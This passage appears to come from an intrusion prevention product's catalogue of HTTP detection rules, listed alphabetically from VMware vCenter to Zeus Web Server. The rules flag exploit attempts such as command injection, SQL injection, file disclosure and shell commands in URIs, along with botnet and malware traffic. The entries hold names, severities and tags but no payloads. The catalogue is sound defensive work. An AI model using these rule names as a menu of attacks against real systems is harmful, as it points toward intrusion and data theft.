Tags: Any Operating System, Any Hardware, VMware vCenter Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1410-5242
Last changed: sgpkg-ips-1410-5242
Vulnerability: VMware-Vcenter-Arbitrary-File-Read
Description:
Back to top

HTTP_CSU-VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1538-5242
Vulnerability: VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656

About this situation: An attempt to exploit a vulnerability in VMware Workspace ONE detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Workspace ONE, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Vulnerability: VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656
Description:
Back to top

HTTP_CSU-Vundo-Traffic

About this situation: Vundo traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Vundo
Description:
Back to top

HTTP_CSU-W32-Jorik-Sefnit

About this situation: A possibly malicious request
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: W32-Jorik-Sefnit
Description:
Back to top

HTTP_CSU-W32-Jorik-Sefnit-2

About this situation: A possibly malicious request
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1344-5242
Vulnerability: W32-Jorik-Sefnit
Description:
Back to top

HTTP_CSU-W32/MyWife.d@MM!M24-Activity

About this situation: W32/MyWife.d@MM!M24 activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: W32/MyWife.d@MM!M24-Malware
Description:
Back to top

HTTP_CSU-Waledac-Bot-Traffic

About this situation: Waledac Bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: Waledac-Bot
Description:
Back to top

HTTP_CSU-Wavlink-WN535K2-WN535K3-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in WAVLINK detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WAVLINK, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1529-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Wavlink-WN535K2-WN535K3-OS-Command-Injection
Description:
Back to top

HTTP_CSU-Wayboard-Cgi-Directory-Traversal

About this situation: Access to vulnerable script
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, Way-Board, CVE2001, Windows not specific, Linux not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Wayboard-Cgi-Directory-Traversal
Description:
Back to top

HTTP_CSU-WebAPP-Apage-Command-Execution

About this situation: Command execution attempt using WebAPP apage.cgi
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WebAPP, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-681-5211
Vulnerability: HTTP-WebAPP-Apage-Command-Execution
Description:
Back to top

HTTP_CSU-WebConnect-Wcp-User-Directory-Traversal

About this situation: WebConnect WCP_USER directory traversal vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WebConnect, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1641-5242
Vulnerability: HTTP-WebConnect-Wcp-User-Directory-Traversal
Description:
Back to top

HTTP_CSU-WebHints-Command-Execution

About this situation: Command execution attempt against hints.pl script in WebHints
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WebHints, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-WebHints-Command-Execution
Description:
Back to top

HTTP_CSU-Webmin-Arbitary-File-Disclosure

About this situation: Detected attempt to fetch arbitary files via Webmin/Usermin
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, Usermin, CVE2006, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Webmin_Arbitary_File_Disclosure
Description:
Back to top

HTTP_CSU-Website-Uploader-Exe-File-Import

About this situation: Vulnerable uploader.exe accessed
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, O'Reilly Software WebSite, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Website-Uploader-Exe-File-Import
Description:
Back to top

HTTP_CSU-Website-Win-C-Sample-Exe-BOF

About this situation: Access to vulnerable win-c-sample.exe
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, O'Reilly Software WebSite, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Website-Win-C-Sample-Exe-BOF
Description:
Back to top

HTTP_CSU-Webster-HTTP-Server-Buffer-Overflow

About this situation: An attempt to exploit a Webster HTTP Server Buffer Overflow vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Webster, CVE2002, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1367-5242
Vulnerability: Webster-HTTP-Server-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Western-Digital-Multiple-Routers-Information-Disclosure

About this situation: An attempt to exploit an information disclosure vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Western Digital My Net N600, Western Digital My Net N750, Western Digital My Net N900, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Western-Digital-Multiple-Routers-Information-Disclosure
Description:
Back to top

HTTP_CSU-WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Windows-Base64-Decode-Command-In-URI

About this situation: A shell command in the URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1039-5242
Last changed: sgpkg-ips-1641-5242
Description:
Back to top

HTTP_CSU-Windows-Explorer-HTA-CLSID-System-Compromise-2

About this situation: Detects attempts to exploit the Windows Explorer HTA vulnerability over WebDAV
Context: HTTP Request URI
Severity: 7
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, x86, MS2006-08, CVE2006, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Windows-Explorer-HTA-CLSID-System-Compromise
Description:
Back to top

HTTP_CSU-Windows-Style-Absolute-Path-In-URI

About this situation: Windows style absolute path in URI detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-447-4219
Last changed: sgpkg-ips-1010-5242
Vulnerability: Directory-Traversal
Description:
Back to top

HTTP_CSU-Wireshark-Insecure-Search-Path-Script-Execution

About this situation: An attempt to exploit a vulnerability in Wireshark Foundation Wireshark detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: Wireshark-Insecure-Search-Path-Script-Execution
Description:
Back to top

HTTP_CSU-Wordpress-10Web-Photo-Gallery-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project 10Web Photo Gallery detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress 10Web Photo Gallery Plugin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Wordpress-10Web-Photo-Gallery-SQL-Injection
Description:
Back to top

HTTP_CSU-Wordpress-Admin-Console-Access-Attempt

About this situation: Access to WordPress admin console login page detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Website-Admin-Console-Access
Description:
Back to top

HTTP_CSU-Wordpress-BulletProof-Security-Backup-Disclosure

About this situation: An attempt to exploit a vulnerability in the Wordpress BulletProof Security plugin detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress BulletProof Security, CVE2021, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: Wordpress-BulletProof-Security-Backup-Disclosure
Description:
Back to top

HTTP_CSU-Wordpress-Google-Maps-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Google Maps Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Google Maps Plugin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1198-5242
Vulnerability: Wordpress-Google-Maps-Plugin-SQL-Injection
Description:
Back to top

HTTP_CSU-Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in the Wordpress Google Tag Manager Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Google Tag Manager Plugin, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Vulnerability: Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Wordpress-Modern-Events-Calendar-SQLi-Scanner

About this situation: An attempt to exploit a vulnerability in the WordPress Modern Events Calendar plugin detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Modern Events Calendar Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Wordpress-Modern-Events-Calendar-SQLi-Scanner
Description:
Back to top

HTTP_CSU-Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress My Calendar plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection
Description:
Back to top

HTTP_CSU-Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762

About this situation: An attempt to exploit a vulnerability in WordPress Perfect Survey Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Vulnerability: Wordpress-Perfect-Survey-Plugin-SQL-Injection-CVE-2021-24762
Description:
Back to top

HTTP_CSU-Wordpress-Plugin-Duplicator-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Wordpress Plugin Duplicator detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Wordpress-Plugin-Duplicator-Arbitrary-File-Read
Description:
Back to top

HTTP_CSU-Wordpress-SEO-Plugin-Url-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project SEO Plugin by Squirrly SEO detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Wordpress-SEO-Plugin-Url-SQL-Injection
Description:
Back to top

HTTP_CSU-Wordpress-Simple-File-List-Plugin-Path-Traversal

About this situation: An attempt to exploit a vulnerability in WordPress Simple File List Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Simple File List Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1533-5242
Vulnerability: Wordpress-Simple-File-List-Plugin-Path-Traversal
Description:
Back to top

HTTP_CSU-Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion

About this situation: An attempt to exploit a vulnerability in WordPress Social Warfare Plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Wordpress-Social-Warfare-Plugin-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress WP Mobile Detector Plugin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: Wordpress-Wp-Mobile-Detector-File-Upload-Vulnerability
Description:
Back to top

HTTP_CSU-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Statistics detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Wordpress-WPS-Hide-Login-Login-Page-Revealer

About this situation: An attempt to exploit a vulnerability in the WPS Hide Login plugin detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, WPS Hide Login Plugin, CVE2021, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1434-5242
Vulnerability: Wordpress-WPS-Hide-Login-Login-Page-Revealer
Description:
Back to top

HTTP_CSU-XCSSET-Malware-Traffic

About this situation: XCSSET malware traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Mac OS, Any Hardware, Mac OS not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: XCSSET-Malware-Traffic
Description:
Back to top

HTTP_CSU-Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Xerox DocuShare detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Xerox DocuShare, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Xerox-Docushare-Resultbackgroundjobmultiple-SQL-Injection
Description:
Back to top

HTTP_CSU-Xupiter-Toolbar

About this situation: Xupiter Toolbar traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Xupiter Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Xupiter-Toolbar
Description:
Back to top

HTTP_CSU-Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Xwiki.org-Xwiki-Importinline-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Xwiki.org-Xwiki-Invitationguestactions-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1629-5242
Vulnerability: Xwiki.org-Xwiki-Invitationguestactions-Code-Injection
Description:
Back to top

HTTP_CSU-Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Xwiki.org-Xwiki-Platform-Flamingo-Theme-UI-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Xwiki.org-Xwiki-Tags-Code-Injection

About this situation: An attempt to exploit a vulnerability in XWiki.org XWiki detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, XWiki, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1519-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Xwiki.org-Xwiki-Tags-Code-Injection
Description:
Back to top

HTTP_CSU-Xymon-Useradm-Command-Execution

About this situation: An attempt to exploit a vulnerability in Xymon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Solaris, BSD, Linux, Any Hardware, Xymon, CVE2016, Unix not specific, Solaris not specific, BSD not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Xymon-Useradm-Command-Execution
Description:
Back to top

HTTP_CSU-YaBB-Cgi-Information-Retrieval

About this situation: A suspicious request to YaBB detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, YaBB Bulletin Board, CVE2000, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: YaBB-Cgi-Information-Retrieval
Description:
Back to top

HTTP_CSU-YouPHPTube-Encoder-Getimage.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in YouPHPTube Encoder detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, YouPHPTube Encoder, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: YouPHPTube-Encoder-Getimage.php-Command-Injection
Description:
Back to top

HTTP_CSU-YouPHPTube-Encoder-Getimagemp4.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in YouPHPTube Encoder detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, YouPHPTube Encoder, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1204-5242
Vulnerability: YouPHPTube-Encoder-Getimagemp4.php-Command-Injection
Description:
Back to top

HTTP_CSU-Zabbix-SQL-Injection

About this situation: An attempt to exploit a Zabbix SQL Injection vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zabbix, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-779-5211
Vulnerability: Zabbix-SQL-Injection
Description:
Back to top

HTTP_CSU-ZeroAccess-Traffic

About this situation: ZeroAccess traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: ZeroAccess-Botnet
Description:
Back to top

HTTP_CSU-Zeroboard-Multiple-File-Disclosure

About this situation: Zeroboard file disclosure
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Zeroboard, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Zeroboard-Multiple-File-Disclosure
Description:
Back to top

HTTP_CSU-ZeroShell-Local-File-Disclosure

About this situation: An attempt to exploit a vulnerability in ZeroShell detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ZeroShell, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1784-5242
Vulnerability: ZeroShell-Local-File-Disclosure
Description:
Back to top

HTTP_CSU-Zeus-Web-Server-File-Read-Vulnerability

About this situation: A vulnerability in Zeus Web server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zeus Web Server, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
